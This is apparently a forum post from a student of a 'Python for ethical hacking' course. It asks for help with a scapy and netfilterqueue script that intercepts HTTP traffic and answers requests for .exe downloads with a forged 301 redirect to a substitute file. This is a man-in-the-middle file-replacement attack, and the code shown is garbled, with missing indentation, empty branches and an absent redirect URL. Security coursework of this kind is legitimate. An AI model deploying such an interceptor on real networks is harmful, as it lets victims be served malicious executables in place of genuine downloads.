Section 8: Writing a File Interceptor - Modifying HTTP Responses on The Fly - Python for ethical hacking by Zaid

In Python for ethical hacking course by Zaid, I was able to sniff the packet and route the URL to a secondary site whenever user tries to download a .exe file. However in the redirect URL a guess a content encoding is sent along with the redirect packet. Please help me to fix the issue. Code as below,

#!/usr/bin/env python3.7
import netfilterqueue
import scapy.all as scapy

ack_list = []

def process_packet(packet):
scapy_packet = scapy.IP(packet.get_payload()) #You are wrapping the payload with IP layer to get more info.
if scapy_packet.haslayer(scapy.Raw):
if scapy_packet[scapy.TCP].dport == 80:
print(“HTTP Request”)
if “.exe” in str(scapy_packet[scapy.Raw].load):
elif scapy_packet[scapy.TCP].sport == 80:
if scapy_packet[scapy.TCP].seq in ack_list:
print(“HTTP Response”)
print("[+] Replacing file")
scapy_packet[scapy.Raw].load = “HTTP/1.1 301 Moved Permanently\nLocation:\n\n
del scapy_packet[scapy.IP].len
del scapy_packet[scapy.IP].chksum
del scapy_packet[scapy.TCP].chksum


queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)

As you can see, the redirect URL has some extra encoding but if you see in the code , i have made proper decoding and encoding using str and decode functions.


This issue is fixed. Thanks.